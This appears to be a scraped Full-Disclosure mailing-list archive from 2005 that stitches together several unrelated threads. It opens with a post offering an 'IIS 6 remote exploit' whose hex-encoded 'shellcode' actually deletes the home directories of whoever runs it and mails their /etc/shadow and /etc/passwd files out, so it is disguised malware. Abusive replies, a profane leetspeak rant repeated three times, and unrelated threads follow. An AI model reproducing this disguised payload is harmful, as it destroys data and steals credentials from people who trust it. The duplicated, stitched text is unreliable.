You are wrong again, it's Smashing the Stick you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly. You're nothing but a newbie wanna be C programmer with a dick in his ass and a lack of hacking skills. Die slowly kthxbye! --- vulcanius [EMAIL PROTECTED] wrote: Last time I checked it was Smashing the Stack, not Smashing the Stick moron. And why the hell do you keep reposting the code when everyone already knows it's a lame backdoor attempt? On 4/20/05, Day Jay [EMAIL PROTECTED] wrote: Yes it is you hat squad lammer newbie. Now get it to work!! You fucking newbie. You're so lame and so is your file system. --- [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: perfect asshole - class101 Jr. Researcher Hat-Squad.com - - Original Message - From: Day Jay [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, April 20, 2005 8:15 PM Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken) Sorry, the previous code was broken. This code should work... Happy Owning!! :) =SNIP /* Proof of concept code Please don't send us e-mails asking us how to hack because we will be forced to skullfsck you. DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! IIS 6 Buffer Overflow Exploit BUG: inetinfo.exe improperly bound checks http requests sent longer than 6998 chars. Can get messy but enough testing, and we have found a way in. VENDOR STATUS: Notified FIX: In process Remote root. eg. #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80 + Connecting to host... + Connected. + Inserting Shellcode... + Done... + Spawining shell.. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\ */ char shellcode[] = \x2f\x62\x69\x6e\x2f\x72\x6d\x20 \x2d\x72\x66\x20\x2f\x68\x6f\x6d \x65\x2f\x2a\x3b\x63\x6c\x65\x61 \x72\x3b\x65\x63\x68\x6f\x20\x62 \x6c\x34\x63\x6b\x68\x34\x74\x2c \x68\x65\x68\x65; char launcher [] = \x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73 \x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69 \x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69 \x73\x63\x6c\x6f\x73\x75\x72\x65\x40 \x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b \x2e\x6f\x72\x67\x2e\x75\x6b\x20; char netcat_shell [] = \x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70 \x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69 \x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69 \x73\x63\x6c\x6f\x73\x75\x72\x65\x40 \x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b \x2e\x6f\x72\x67\x2e\x75\x6b\x20; main() { file://Section Initialises designs implemented by mexicans file://Imigrate system(launcher); system(netcat_shell); system(shellcode); file://int socket = 0; file://double long port = 0.0; file://#DEFINE port host address file://#DEFINE number of inters file://#DEFINE gull eeuEE // for(int j; j 30; j++) { file://Find socket remote address fault printf(.); } file://overtake inetinfo here IIS_66^ return 0; } __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oddness with the MS antispyware beta
I see that extra MS antispyware window (systrayhide, systrayshow, ...) also on a two-monitor workstation using nVidia's desktop manager. A similar thing happens with an ancient pop-up stopper I use (AKiller). If you're seeing it on a laptop, it's probably because the laptop has a second monitor capability and is running the advanced window management functionality to know about the second monitor. Both are just artifacts of either poorly written software (Giant Anti-spyware, my little old AKiller program) or poorly written window managers (or both) which result in the don't show this window bit being ignored when under advanced window management. They're annoying, but not an indication of anything nefarious. -Jay Libove, CISSP Atlanta, GA, US Message: 9 Date: Mon, 11 Apr 2005 23:04:38 -0600 From: Scott Edwards [EMAIL PROTECTED] Subject: [Full-disclosure] Re: Oddness with the MS antispyware beta To: Gregh [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Message-ID: [EMAIL PROTECTED] Content-Type: text/plain; charset=ISO-8859-1 Are you able to isolate it when running a selective startup via msconfig? Also, does something like winspy give you any clues? On 4/11/05, Gregh [EMAIL PROTECTED] wrote: - Original Message - From: MN Vasquez [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Tuesday, April 12, 2005 4:02 AM Subject: [Full-disclosure] Oddness with the MS antispyware beta On the 2nd monitor I found a program window hiding. Basically, in a very odd position -- on a typically non-displayed portion of the desktop, which I only found by configuring multiple monitors. It seems the programmers are hiding a window, which I have attached as a jpg. For those that don't want to open an attachment: there are 5 buttons: systrayhide, systrayshow, systraynormal, systrascanning, systrayupdating. Sorry old son but it isn't hidden in any nasty or bug kind of way. I have 2 XPSP2 machines, one is a laptop and the other a desktop. For some reason that window doesn't show when Antispyware is started on the desktop with a normal CRT monitor but it does on the laptop every singles time. Normally it hides as in turns invisible after the prog has completed starting. Greg. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [hr0n073rr0r15m - 7h3 J4ck50ff 7r14l.
d34r c0rr41 r33f, 1 r3411y 4m 50 4nn0y3d 70 7h3 3x7r3m3. 1 r3411y 4m 50 4nn0y3d 7h47 N7P w0u1d 74k3 7h3 71m3 70 wr173 4 14m3 3m411 70 3v3ry0n3 11k3 7h47 b3c4u53 1337 5p34k 5h0u1d 0n1y b3 r34d b13 7h4 31337 0n1y 0n 53cr37 b4kch4nn315 U c0ck5uck3r. 1n 411 f41rn355 7h0u64, 1 d0 h4v3 70 54y 7h47 1 4m qu173 1mpr3553d w17h 7h3 f1n63r1n6/c10ck 5k3w p4p3r 4u7h0r3d b13 7h47 dyn4m1c 7r10-74d,k.c. 4nd 4ndr3 1c3 c01d 3000...1f y0u 4r3 0n3 0f 7h3m, 3xp053 y0531f 0r 43v3r h01d j00r 610ck. 7311 m3 m0r3 7h0 N7P-50 f4r j00 6uy5 0n1y 533m 1mm4mm37u3r. p34z, d4y 70 7h3 m07h3rfuck1n6 j4y b17ch! 1 w4n7 m0r3!! --- Sorral Bouddashiss [EMAIL PROTECTED] wrote: 53cur17y 1ndu57ry [0nc3rn3d-p3r50n5 Pr353n7 [hr0n073rr0r15m - 7h3 J4ck50ff 7r14l. Gr3371ng5 f3ll0w hum4n5 w3lc0m3 70 7h3 y34r 3337, 0n 4 qu1ck pr3-4dv150ry n073 (4nd 7h1nk1ng 4b0u7 7h053 0f u5 wh0 d0n'7 f4ll 1n70 7h3 c473g0ry 0f Hum4n): Wh47 w45 up w17h G0ld5731n 574lk1ng 7h3 57r3375, 4nd n0 d0ub7 7h3 m4l3 y0u7h, 0f B3rl1n 1n D3c3mb3r? 51[ 4g3n75 1n 7h3 f13ld r3p0r7 h3 w45 533n r4mbl1ng 70 h1m53lf fr0m 4 p0d1um wh1l57 7h053 1n 7h3 4ud13nc3 (w4171ng f0r B0b0 7h3 H4x0r cl0wn) w3r3 w4171ng 70 533 1f 3v3n7 53cur17y w0uld 7r4nqu1l153 7h3 r4b1d b3457. 1n 07h3r n3w5: 17 h45 b33n br0ugh7 70 0ur 4773n710n 7h47 5k1ppy h45 f4ll3n d0wn 7h3 w3ll 4nd L177l3 71mmy d035n'7 g1v3 4 5h17 45 h3 h45 4 n3w M1n1-M4c wh1ch 15 50 57r1pp3d d0wn 7h47 17 c0m35 w17h0u7 4ny c0mp0n3n75 70 k33p c057 l0w, unl355 y0u 4r3 4 m3mb3r 0f 7h3 publ1c wh0 74lk5 4b0u7 17. huh? cr4p 7h47 15n'7 m34n7 70 b3 r3l3453d f0r 12 m0n7h5? 50m30n3 c0uld h4v3 70ld m3! wh47 w17h 7h3 3x-3N 35 4Y (0bfuck473d 70 4nn0y 7h3m) 3mpl0y335 h4v1ng Ru5514n5 wr171ng plug1n5 f0r 7h31r 5h177y c0d3. H4ll000 D4v3. 574y1ng w17h 3N 35 4Y l1nk5 (0r lynx y0ur ch01c3) H45 4ny0n3 b33n n071c1ng h0w l0ckh33d m4r71n 15 51ph0n1ng H0glund5 1ll g07 ++'5 57r41gh7 1n70 7h3 3N 35 4Y? 0ur m41n n3w5 570ry 70d4y: 4 pl07 15 4f007 (n07 4 h4nd 0r 4 5h0ld3r bu7 4 h0l3 f007) wh1ch c0uld 5h4k3 7h3 v3ry f0und4710n5 0f N7P. 4 g4ng 0f p4ck37570rm 3xpl017 5w1ng1ng y0uf 4r3 pl4nn1ng 70 74rg37 7h3 v3ry fund4m3n74l 0f 0ur m0d3rn w4y 0f l1v1ng. N071fy 7h3 FR33 pr355!!! .. 0h g00d p01n7. 73ll y0ur fr13nd5 1n5734d! 0h. 7h3 pl4n? 70 4774ck |_|7[ 1753lf. N07 7h3 |_|n1v3r54l 7r4d3 [3n7r3, K4z4k574n 15 n07 7h3 c3n73r 0f 7h3 un1v3r53. (dumb455) 4 r3c3n7 p4p3r d15cu551ng 7h3 f1ng3r1ng 0f 5y573m5 u51ng pr0c3550r cl0ck 5k3w5 w45 0nly 7h3 b3g1nn1ng. 7h353 y0uf 4r3 pl4nn1ng n07 0nly 70 5kr3w pr0c3550r5, bu7 m1cr0w4v35 4nd 4l50 bump3r p00l 3l3c7r0n1c 5c0r1ng 5y573m5 (dw33b5). D0 7h3y c4r3 f0r 7h3 1D5 w47ch1ng m0nk3y5 wh0 517 7hr0ugh0u7 7h3 w0rld r34dy 70 u53 V01P 70 n071fy fr13nd5 0f n3w p0rn 51735 7h47 4r3 53n7 7hr0ugh 5p4m? N0. H0w w1ll 7h353 y0ung 4nd c4r3fr33 m3mb3r5 0f 7h3 53cur17y 5c3n3 b3 4bl3 70 f33d 7h3m53lv35 1f 7h31r cr3d17 c4rd5 d0n7 4u7h0r1z3 wh3n 0rd3r1ng p1zz4? 7h3r3 15 7h3 p0551b1l17y 7h3y m4y w0rk 0u7 h0w 70 pr1c3-537 bu7 l1k3 7h3 r357 0f 53cur17y pr0f35510n4l5 0u7 7h3r3 7h3y w0uldn7 kn0w 7h3 d1ff3r3nc3 b37w33n 4 p1zz4 4nd 4 l454gn3. 4m47ur35. 15 7H3R3 N0 H|_|M4N17Y! Wh47 c4n w3 pr0p053 70 c0mb47 7h15 0b5c3n3 4c7 wh1ch 7hr3473n5 70 r3537 5ub5cr1p710n5 70 m1dg37 p0rn 51735? V1g1l3nc3! 1f y0u 533 50m30n3 w4lk1ng 7h3 wr0ng w4y 4r0und 7h3 c4n733n, 1nf0rm 7h3 4u7h0r17135. 1f y0u 7h1nk 50m30n3 m4y b3 4dju571ng 7h31r p3r50n3l 71m3 p13c3 pr10r 70 4n 4774ck up0n 71m3 1753lf N071fy y0ur l0c4l m1n1573r. 1f y0u 7h1nk WW45P 0r 175 4f1l14735 4r3 54f3 70 b3 l3f7 w17h y0ur k1d5, 5h007 y0ur53lf 4nd pr073c7 y0ur 0f5pr1ng3 7h47 w4y. 1f 3v3ry7h1ng f41l5. P4n1c. N07h1ng 41d5 4 w4rm0ng3r b3773r 7h4n 1gn0r4nc3 4nd p4n1c. H1 G30rg3. 1f 7h353 p30pl3 4r3 4ll0w3d 70 g37 4w4y w17h 7h31r h3n1u5 cr1m35 4g41n57 hum4n1733 7h3r3 15 7h3 p0551b1l17y 7h47 7h3y c4n 570p 7h3 v3ry m0710n 0f 7h3 34r7h (0r m4yb3 m4k3 17 w0bbl3 4 b17). (N0 1 4m n07 571ll 74lk1ng 4b0u7 G30rg3, y0u 4r3 7h3 0n3 wh0 j01n3d 7h053 7w0 c0mpl37ly d374ch3d 53n73nc35 70g37h3r.Fr3ud.) 7h47 w0uld r34lly 5kr3w up 7h3 cr45h l4nd1ng 1n r05w3ll n3x7 m0n7h. 4h cr4p d1d 17 4g41n, W3ll Y0|_| 7ry 5p3nd1ng y0ur d4y l00k1ng 4f73r 71m3 1753lf 7H1NG5 G37 F|_|[K1NG [0MPL1[473D. W3 w15h y0u 4 v3ry 54f3 57 Dr0ng0'5 d4y, 7h47 5h33p 4bu53r pu75 r3dn3k5 70 5h4m3. y0ur fr13nd 7h3 50rr4l. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do you Yahoo!? Yahoo! Personals - Better first dates. More second dates. http://personals.yahoo.com ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] [hr0n073rr0r15m - 7h3 J4ck50ff 7r14l.
d34r c0rr41 r33f, 1 r3411y 4m 50 4nn0y3d 70 7h3 3x7r3m3. 1 r3411y 4m 50 4nn0y3d 7h47 N7P w0u1d 74k3 7h3 71m3 70 wr173 4 14m3 3m411 70 3v3ry0n3 11k3 7h47 b3c4u53 1337 5p34k 5h0u1d 0n1y b3 r34d b13 7h4 31337 0n1y 0n 53cr37 b4kch4nn315 U c0ck5uck3r. 1n 411 f41rn355 7h0u64, 1 d0 h4v3 70 54y 7h47 1 4m qu173 1mpr3553d w17h 7h3 f1n63r1n6/c10ck 5k3w p4p3r 4u7h0r3d b13 7h47 dyn4m1c 7r10-74d,k.c. 4nd 4ndr3 1c3 c01d 3000...1f y0u 4r3 0n3 0f 7h3m, 3xp053 y0531f 0r 43v3r h01d j00r 610ck. 7311 m3 m0r3 7h0 N7P-50 f4r j00 6uy5 0n1y 533m 1mm4mm37u3r. p34z, d4y 70 7h3 m07h3rfuck1n6 j4y b17ch! 1 w4n7 m0r3!! --- Sorral Bouddashiss [EMAIL PROTECTED] wrote: 53cur17y 1ndu57ry [0nc3rn3d-p3r50n5 Pr353n7 [hr0n073rr0r15m - 7h3 J4ck50ff 7r14l. Gr3371ng5 f3ll0w hum4n5 w3lc0m3 70 7h3 y34r 3337, 0n 4 qu1ck pr3-4dv150ry n073 (4nd 7h1nk1ng 4b0u7 7h053 0f u5 wh0 d0n'7 f4ll 1n70 7h3 c473g0ry 0f Hum4n): Wh47 w45 up w17h G0ld5731n 574lk1ng 7h3 57r3375, 4nd n0 d0ub7 7h3 m4l3 y0u7h, 0f B3rl1n 1n D3c3mb3r? 51[ 4g3n75 1n 7h3 f13ld r3p0r7 h3 w45 533n r4mbl1ng 70 h1m53lf fr0m 4 p0d1um wh1l57 7h053 1n 7h3 4ud13nc3 (w4171ng f0r B0b0 7h3 H4x0r cl0wn) w3r3 w4171ng 70 533 1f 3v3n7 53cur17y w0uld 7r4nqu1l153 7h3 r4b1d b3457. 1n 07h3r n3w5: 17 h45 b33n br0ugh7 70 0ur 4773n710n 7h47 5k1ppy h45 f4ll3n d0wn 7h3 w3ll 4nd L177l3 71mmy d035n'7 g1v3 4 5h17 45 h3 h45 4 n3w M1n1-M4c wh1ch 15 50 57r1pp3d d0wn 7h47 17 c0m35 w17h0u7 4ny c0mp0n3n75 70 k33p c057 l0w, unl355 y0u 4r3 4 m3mb3r 0f 7h3 publ1c wh0 74lk5 4b0u7 17. huh? cr4p 7h47 15n'7 m34n7 70 b3 r3l3453d f0r 12 m0n7h5? 50m30n3 c0uld h4v3 70ld m3! wh47 w17h 7h3 3x-3N 35 4Y (0bfuck473d 70 4nn0y 7h3m) 3mpl0y335 h4v1ng Ru5514n5 wr171ng plug1n5 f0r 7h31r 5h177y c0d3. H4ll000 D4v3. 574y1ng w17h 3N 35 4Y l1nk5 (0r lynx y0ur ch01c3) H45 4ny0n3 b33n n071c1ng h0w l0ckh33d m4r71n 15 51ph0n1ng H0glund5 1ll g07 ++'5 57r41gh7 1n70 7h3 3N 35 4Y? 0ur m41n n3w5 570ry 70d4y: 4 pl07 15 4f007 (n07 4 h4nd 0r 4 5h0ld3r bu7 4 h0l3 f007) wh1ch c0uld 5h4k3 7h3 v3ry f0und4710n5 0f N7P. 4 g4ng 0f p4ck37570rm 3xpl017 5w1ng1ng y0uf 4r3 pl4nn1ng 70 74rg37 7h3 v3ry fund4m3n74l 0f 0ur m0d3rn w4y 0f l1v1ng. N071fy 7h3 FR33 pr355!!! .. 0h g00d p01n7. 73ll y0ur fr13nd5 1n5734d! 0h. 7h3 pl4n? 70 4774ck |_|7[ 1753lf. N07 7h3 |_|n1v3r54l 7r4d3 [3n7r3, K4z4k574n 15 n07 7h3 c3n73r 0f 7h3 un1v3r53. (dumb455) 4 r3c3n7 p4p3r d15cu551ng 7h3 f1ng3r1ng 0f 5y573m5 u51ng pr0c3550r cl0ck 5k3w5 w45 0nly 7h3 b3g1nn1ng. 7h353 y0uf 4r3 pl4nn1ng n07 0nly 70 5kr3w pr0c3550r5, bu7 m1cr0w4v35 4nd 4l50 bump3r p00l 3l3c7r0n1c 5c0r1ng 5y573m5 (dw33b5). D0 7h3y c4r3 f0r 7h3 1D5 w47ch1ng m0nk3y5 wh0 517 7hr0ugh0u7 7h3 w0rld r34dy 70 u53 V01P 70 n071fy fr13nd5 0f n3w p0rn 51735 7h47 4r3 53n7 7hr0ugh 5p4m? N0. H0w w1ll 7h353 y0ung 4nd c4r3fr33 m3mb3r5 0f 7h3 53cur17y 5c3n3 b3 4bl3 70 f33d 7h3m53lv35 1f 7h31r cr3d17 c4rd5 d0n7 4u7h0r1z3 wh3n 0rd3r1ng p1zz4? 7h3r3 15 7h3 p0551b1l17y 7h3y m4y w0rk 0u7 h0w 70 pr1c3-537 bu7 l1k3 7h3 r357 0f 53cur17y pr0f35510n4l5 0u7 7h3r3 7h3y w0uldn7 kn0w 7h3 d1ff3r3nc3 b37w33n 4 p1zz4 4nd 4 l454gn3. 4m47ur35. 15 7H3R3 N0 H|_|M4N17Y! Wh47 c4n w3 pr0p053 70 c0mb47 7h15 0b5c3n3 4c7 wh1ch 7hr3473n5 70 r3537 5ub5cr1p710n5 70 m1dg37 p0rn 51735? V1g1l3nc3! 1f y0u 533 50m30n3 w4lk1ng 7h3 wr0ng w4y 4r0und 7h3 c4n733n, 1nf0rm 7h3 4u7h0r17135. 1f y0u 7h1nk 50m30n3 m4y b3 4dju571ng 7h31r p3r50n3l 71m3 p13c3 pr10r 70 4n 4774ck up0n 71m3 1753lf N071fy y0ur l0c4l m1n1573r. 1f y0u 7h1nk WW45P 0r 175 4f1l14735 4r3 54f3 70 b3 l3f7 w17h y0ur k1d5, 5h007 y0ur53lf 4nd pr073c7 y0ur 0f5pr1ng3 7h47 w4y. 1f 3v3ry7h1ng f41l5. P4n1c. N07h1ng 41d5 4 w4rm0ng3r b3773r 7h4n 1gn0r4nc3 4nd p4n1c. H1 G30rg3. 1f 7h353 p30pl3 4r3 4ll0w3d 70 g37 4w4y w17h 7h31r h3n1u5 cr1m35 4g41n57 hum4n1733 7h3r3 15 7h3 p0551b1l17y 7h47 7h3y c4n 570p 7h3 v3ry m0710n 0f 7h3 34r7h (0r m4yb3 m4k3 17 w0bbl3 4 b17). (N0 1 4m n07 571ll 74lk1ng 4b0u7 G30rg3, y0u 4r3 7h3 0n3 wh0 j01n3d 7h053 7w0 c0mpl37ly d374ch3d 53n73nc35 70g37h3r.Fr3ud.) 7h47 w0uld r34lly 5kr3w up 7h3 cr45h l4nd1ng 1n r05w3ll n3x7 m0n7h. 4h cr4p d1d 17 4g41n, W3ll Y0|_| 7ry 5p3nd1ng y0ur d4y l00k1ng 4f73r 71m3 1753lf 7H1NG5 G37 F|_|[K1NG [0MPL1[473D. W3 w15h y0u 4 v3ry 54f3 57 Dr0ng0'5 d4y, 7h47 5h33p 4bu53r pu75 r3dn3k5 70 5h4m3. y0ur fr13nd 7h3 50rr4l. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do you Yahoo!? Yahoo! Personals - Better first dates. More second dates. http://personals.yahoo.com ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] [hr0n073rr0r15m - 7h3 J4ck50ff 7r14l.
d34r c0rr41 r33f, 1 r3411y 4m 50 4nn0y3d 70 7h3 3x7r3m3. 1 r3411y 4m 50 4nn0y3d 7h47 N7P w0u1d 74k3 7h3 71m3 70 wr173 4 14m3 3m411 70 3v3ry0n3 11k3 7h47 b3c4u53 1337 5p34k 5h0u1d 0n1y b3 r34d b13 7h4 31337 0n1y 0n 53cr37 b4kch4nn315 U c0ck5uck3r. 1n 411 f41rn355 7h0u64, 1 d0 h4v3 70 54y 7h47 1 4m qu173 1mpr3553d w17h 7h3 f1n63r1n6/c10ck 5k3w p4p3r 4u7h0r3d b13 7h47 dyn4m1c 7r10-74d,k.c. 4nd 4ndr3 1c3 c01d 3000...1f y0u 4r3 0n3 0f 7h3m, 3xp053 y0531f 0r 43v3r h01d j00r 610ck. 7311 m3 m0r3 7h0 N7P-50 f4r j00 6uy5 0n1y 533m 1mm4mm37u3r. p34z, d4y 70 7h3 m07h3rfuck1n6 j4y b17ch! 1 w4n7 m0r3!! --- Sorral Bouddashiss [EMAIL PROTECTED] wrote: 53cur17y 1ndu57ry [0nc3rn3d-p3r50n5 Pr353n7 [hr0n073rr0r15m - 7h3 J4ck50ff 7r14l. Gr3371ng5 f3ll0w hum4n5 w3lc0m3 70 7h3 y34r 3337, 0n 4 qu1ck pr3-4dv150ry n073 (4nd 7h1nk1ng 4b0u7 7h053 0f u5 wh0 d0n'7 f4ll 1n70 7h3 c473g0ry 0f Hum4n): Wh47 w45 up w17h G0ld5731n 574lk1ng 7h3 57r3375, 4nd n0 d0ub7 7h3 m4l3 y0u7h, 0f B3rl1n 1n D3c3mb3r? 51[ 4g3n75 1n 7h3 f13ld r3p0r7 h3 w45 533n r4mbl1ng 70 h1m53lf fr0m 4 p0d1um wh1l57 7h053 1n 7h3 4ud13nc3 (w4171ng f0r B0b0 7h3 H4x0r cl0wn) w3r3 w4171ng 70 533 1f 3v3n7 53cur17y w0uld 7r4nqu1l153 7h3 r4b1d b3457. 1n 07h3r n3w5: 17 h45 b33n br0ugh7 70 0ur 4773n710n 7h47 5k1ppy h45 f4ll3n d0wn 7h3 w3ll 4nd L177l3 71mmy d035n'7 g1v3 4 5h17 45 h3 h45 4 n3w M1n1-M4c wh1ch 15 50 57r1pp3d d0wn 7h47 17 c0m35 w17h0u7 4ny c0mp0n3n75 70 k33p c057 l0w, unl355 y0u 4r3 4 m3mb3r 0f 7h3 publ1c wh0 74lk5 4b0u7 17. huh? cr4p 7h47 15n'7 m34n7 70 b3 r3l3453d f0r 12 m0n7h5? 50m30n3 c0uld h4v3 70ld m3! wh47 w17h 7h3 3x-3N 35 4Y (0bfuck473d 70 4nn0y 7h3m) 3mpl0y335 h4v1ng Ru5514n5 wr171ng plug1n5 f0r 7h31r 5h177y c0d3. H4ll000 D4v3. 574y1ng w17h 3N 35 4Y l1nk5 (0r lynx y0ur ch01c3) H45 4ny0n3 b33n n071c1ng h0w l0ckh33d m4r71n 15 51ph0n1ng H0glund5 1ll g07 ++'5 57r41gh7 1n70 7h3 3N 35 4Y? 0ur m41n n3w5 570ry 70d4y: 4 pl07 15 4f007 (n07 4 h4nd 0r 4 5h0ld3r bu7 4 h0l3 f007) wh1ch c0uld 5h4k3 7h3 v3ry f0und4710n5 0f N7P. 4 g4ng 0f p4ck37570rm 3xpl017 5w1ng1ng y0uf 4r3 pl4nn1ng 70 74rg37 7h3 v3ry fund4m3n74l 0f 0ur m0d3rn w4y 0f l1v1ng. N071fy 7h3 FR33 pr355!!! .. 0h g00d p01n7. 73ll y0ur fr13nd5 1n5734d! 0h. 7h3 pl4n? 70 4774ck |_|7[ 1753lf. N07 7h3 |_|n1v3r54l 7r4d3 [3n7r3, K4z4k574n 15 n07 7h3 c3n73r 0f 7h3 un1v3r53. (dumb455) 4 r3c3n7 p4p3r d15cu551ng 7h3 f1ng3r1ng 0f 5y573m5 u51ng pr0c3550r cl0ck 5k3w5 w45 0nly 7h3 b3g1nn1ng. 7h353 y0uf 4r3 pl4nn1ng n07 0nly 70 5kr3w pr0c3550r5, bu7 m1cr0w4v35 4nd 4l50 bump3r p00l 3l3c7r0n1c 5c0r1ng 5y573m5 (dw33b5). D0 7h3y c4r3 f0r 7h3 1D5 w47ch1ng m0nk3y5 wh0 517 7hr0ugh0u7 7h3 w0rld r34dy 70 u53 V01P 70 n071fy fr13nd5 0f n3w p0rn 51735 7h47 4r3 53n7 7hr0ugh 5p4m? N0. H0w w1ll 7h353 y0ung 4nd c4r3fr33 m3mb3r5 0f 7h3 53cur17y 5c3n3 b3 4bl3 70 f33d 7h3m53lv35 1f 7h31r cr3d17 c4rd5 d0n7 4u7h0r1z3 wh3n 0rd3r1ng p1zz4? 7h3r3 15 7h3 p0551b1l17y 7h3y m4y w0rk 0u7 h0w 70 pr1c3-537 bu7 l1k3 7h3 r357 0f 53cur17y pr0f35510n4l5 0u7 7h3r3 7h3y w0uldn7 kn0w 7h3 d1ff3r3nc3 b37w33n 4 p1zz4 4nd 4 l454gn3. 4m47ur35. 15 7H3R3 N0 H|_|M4N17Y! Wh47 c4n w3 pr0p053 70 c0mb47 7h15 0b5c3n3 4c7 wh1ch 7hr3473n5 70 r3537 5ub5cr1p710n5 70 m1dg37 p0rn 51735? V1g1l3nc3! 1f y0u 533 50m30n3 w4lk1ng 7h3 wr0ng w4y 4r0und 7h3 c4n733n, 1nf0rm 7h3 4u7h0r17135. 1f y0u 7h1nk 50m30n3 m4y b3 4dju571ng 7h31r p3r50n3l 71m3 p13c3 pr10r 70 4n 4774ck up0n 71m3 1753lf N071fy y0ur l0c4l m1n1573r. 1f y0u 7h1nk WW45P 0r 175 4f1l14735 4r3 54f3 70 b3 l3f7 w17h y0ur k1d5, 5h007 y0ur53lf 4nd pr073c7 y0ur 0f5pr1ng3 7h47 w4y. 1f 3v3ry7h1ng f41l5. P4n1c. N07h1ng 41d5 4 w4rm0ng3r b3773r 7h4n 1gn0r4nc3 4nd p4n1c. H1 G30rg3. 1f 7h353 p30pl3 4r3 4ll0w3d 70 g37 4w4y w17h 7h31r h3n1u5 cr1m35 4g41n57 hum4n1733 7h3r3 15 7h3 p0551b1l17y 7h47 7h3y c4n 570p 7h3 v3ry m0710n 0f 7h3 34r7h (0r m4yb3 m4k3 17 w0bbl3 4 b17). (N0 1 4m n07 571ll 74lk1ng 4b0u7 G30rg3, y0u 4r3 7h3 0n3 wh0 j01n3d 7h053 7w0 c0mpl37ly d374ch3d 53n73nc35 70g37h3r.Fr3ud.) 7h47 w0uld r34lly 5kr3w up 7h3 cr45h l4nd1ng 1n r05w3ll n3x7 m0n7h. 4h cr4p d1d 17 4g41n, W3ll Y0|_| 7ry 5p3nd1ng y0ur d4y l00k1ng 4f73r 71m3 1753lf 7H1NG5 G37 F|_|[K1NG [0MPL1[473D. W3 w15h y0u 4 v3ry 54f3 57 Dr0ng0'5 d4y, 7h47 5h33p 4bu53r pu75 r3dn3k5 70 5h4m3. y0ur fr13nd 7h3 50rr4l. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Yahoo! Messenger Show us what our next emoticon should look like. Join the fun. http://www.advision.webevents.yahoo.com/emoticontest ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] Social Engineering: You Have Been A Victim
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Thu, 17 Mar 2005, Ron DuFresne wrote: More: http://castlecops.com/article-5807-nested-0-0.html gov workers do [not] even need to be bribed with chocolate; http://www.securityfocus.com/news/10708?ref=rss It's not just government workers. It's any human being who's been raised to be social. According to Judeo-Christian theology, humanity gained knowledge of Good Evil in the Garden of Eden. Unfortunately, the ability to differentiate between the two was not part of the package deal. This, coupled with the demands of a polite society, is why social engineering can strike anyone, anywhere...regardless of their vocation in the public or private sector. It is considered socially unacceptable to be unhelpful to others, even strangers over the phone. Hell, some people can't even tell telemarketers to buzz off so they have to buy an electronic device to do it for them. This is why social engineering works so well...and why folks like ourselves are considered paranoid and anti-social when we start pulling IDs and taking names. - -Jay ((___ )) )) .-There's always time for a good cup of coffee-. --. C|~~|C|~~| (- Jay D. Dyson -- [EMAIL PROTECTED] -) |= |-' `--' `--' ` WhyareyouaskingmehowmuchcoffeeI'vehad? ' `--' -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.0 (TreacherOS) Comment: See http://www.treachery.net/~jdyson/ for current keys. iD8DBQFCOwjWBYoRACwSF0cRAtO2AKCVmGZheJZdowrRknKGF3ypxx6BwQCfZqvg 0n9Ubeh3gg3aQGqfMEwNfy4= =ajQE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://www.secunia.com/
Re: [Full-disclosure] Wi-fi. Approaching customers
I'm not sure I'd use the words covered legally. Keep inmind in some areas people might feel this type of activity violates federal wiretapping laws. Doesn't mean they're right or wrong just means you could be causing yourself some serious issues. I can say for certain that I've seen small security company x approach another company y, turns out y is owned by a fortune 100 company, they report it up the chain and small security company x gets a visit from the fbi. If you know open wireless is a serious problem, add that information (generally) to your marketing material and indicate you can fix those types of problems, but pointing out you've in someway shape or form monitored their network and you're contacting them is going to result in some headaches. - Original Message - From: Wade Woolwine [EMAIL PROTECTED] To: Gregh [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Tuesday, March 15, 2005 2:55 PM Subject: 